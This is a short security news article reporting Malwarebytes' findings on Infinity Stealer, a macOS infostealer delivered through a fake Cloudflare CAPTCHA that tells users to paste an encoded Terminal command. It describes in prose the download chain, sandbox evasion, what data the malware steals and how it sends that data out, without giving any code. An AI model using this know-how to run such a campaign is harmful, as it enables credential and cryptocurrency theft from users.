A newly discovered malware called Infinity Stealer is now targeting macOS users using a clever mix of social engineering and advanced coding techniques.
Security researchers at Malwarebytes say this is the first time a macOS attack has combined a fake CAPTCHA trick with a Python-based infostealer that is compiled into a native app using the open source Nuitka compiler.
The attack begins with a deceptive webpage designed to look like a Cloudflare human verification check. Instead of asking users to click a checkbox, it instructs them to copy and paste a command into the macOS Terminal to prove they are human. This method, known as ClickFix, is designed to trick users into running malicious code themselves.
The command shown to the victim is hidden using base64 encoding so it appears harmless. However, once pasted into Terminal, it decodes into a Bash script that downloads the next stage of the attack. This script writes a hidden file into the system’s temporary folder, removes macOS security flags, and runs the file in the background. It also passes instructions from the attackers and then deletes itself, making it harder to trace what happened.
The downloaded file is a large macOS binary created using Nuitka. Unlike traditional tools like PyInstaller, which package Python code in a way that can still be recognized, Nuitka converts Python into C code and compiles it into a real native executable. This makes the malware much more difficult for security tools to analyze or detect.
Inside this binary is another compressed component that contains the actual Infinity Stealer malware. Before doing anything, the malware checks if it is running in a virtual machine or security sandbox. If it detects analysis tools, it may avoid executing to stay hidden.
Once active, the malware begins collecting sensitive data from the infected system. It can steal saved passwords from browsers like Chrome and Firefox, access macOS Keychain data, extract cryptocurrency wallet information, and search for sensitive information stored in developer files such as .env files. It can also capture screenshots of the user’s system.
All the stolen data is then sent to attacker-controlled servers using HTTP requests. After completing the operation, the malware even sends a notification through Telegram to alert the attackers that the data has been successfully collected.
If this article helped you, please consider supporting our work. Every small contribution keeps Abijita.com independent and running.
Researchers warn that this campaign shows how macOS threats are becoming more advanced and targeted. The use of native binaries and social engineering makes this attack especially dangerous because it relies on user action rather than exploiting system vulnerabilities.
